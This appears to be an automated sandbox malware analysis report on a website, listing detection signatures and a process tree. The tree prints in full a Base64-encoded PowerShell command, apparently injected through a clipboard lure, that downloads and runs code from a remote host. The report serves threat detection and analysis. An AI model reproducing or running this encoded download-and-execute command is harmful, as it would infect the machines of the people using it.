Edit tour
Windows
Analysis Report
http://www.thearchiterra.gr/
Overview
Detection
Score: | 88 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Detect drive by download via clipboard copy & paste
Suricata IDS alerts for network traffic
Yara detected Powershell decode and execute
AI detected landing page (webpage, office document or email)
Connects to a pastebin service (likely for C&C)
Encrypted powershell cmdline option found
Sigma detected: Net WebClient Casing Anomalies
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Uses ipconfig to lookup or modify the Windows network settings
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTML page contains hidden javascript code
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Execution of Powershell with Base64
Stores files to the Windows start menu directory
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64_ra
- chrome.exe (PID: 6632 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed "about :blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 5896 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2060 --fi eld-trial- handle=198 0,i,439676 0410683812 038,166177 1015279947 0226,26214 4 --disabl e-features =Optimizat ionGuideMo delDownloa ding,Optim izationHin ts,Optimiz ationHints Fetching,O ptimizatio nTargetPre diction /p refetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
- chrome.exe (PID: 1444 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" "htt p://www.th earchiterr a.gr/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
- powershell.exe (PID: 6044 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 3720 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - ipconfig.exe (PID: 2576 cmdline:
"C:\Window s\system32 \ipconfig. exe" /flus hdns MD5: 62F170FB07FDBB79CEB7147101406EB8) - powershell.exe (PID: 3368 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -ep Remote Signed -w 1 -enc "JA BSAEQAIAA9 ACAAWwBiAG 8AbwBsAF0A QAAoADAAeA AwADEAQgBF ACkAOwAkAF UATwAgAD0A IABbAFMAeQ BzAHQAZQBt AC4AVABlAH gAdAAuAEUA bgBjAG8AZA BpAG4AZwBd ADoAOgBVAF QARgA4AC4A RwBlAHQAUw B0AHIAaQBu AGcAKABbAF MAeQBzAHQA ZQBtAC4AQw BvAG4AdgBl AHIAdABdAD oAOgBGAHIA bwBtAEIAYQ BzAGUANgA0 AFMAdAByAG kAbgBnACgA IgBhAEgAUg AwAGMASABN ADYATAB5AD kAeQBaAFcA NQAwAGMAbg BrAHUAWQAy ADgAdgBaAE gAbAA2AE4A agBZADEAYw BtAEkAdgBj AG0ARgAzAC IAKQApADsA JABDAE8AIA A9ACAATgBl AHcALQBPAG IAagBlAGMA dAAgAE4AZQ B0AC4AVwBl AGIAQwBsAG kAZQBuAHQA OwAkAFMATw BGACAAPQAg ACQAQwBPAC 4ARABvAHcA bgBsAG8AYQ BkAFMAdABy AGkAbgBnAC gAJABVAE8A KQA7AGkAZQ B4ACAAJABT AE8ARgA7AC QAbgB1AGwA bAAgAD0AIA BbAFMAeQBz AHQAZQBtAC 4AQwBvAGwA bABlAGMAdA BpAG8AbgBz AC4AQQByAH IAYQB5AEwA aQBzAHQAXQ A=" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 2228 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security | ||
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |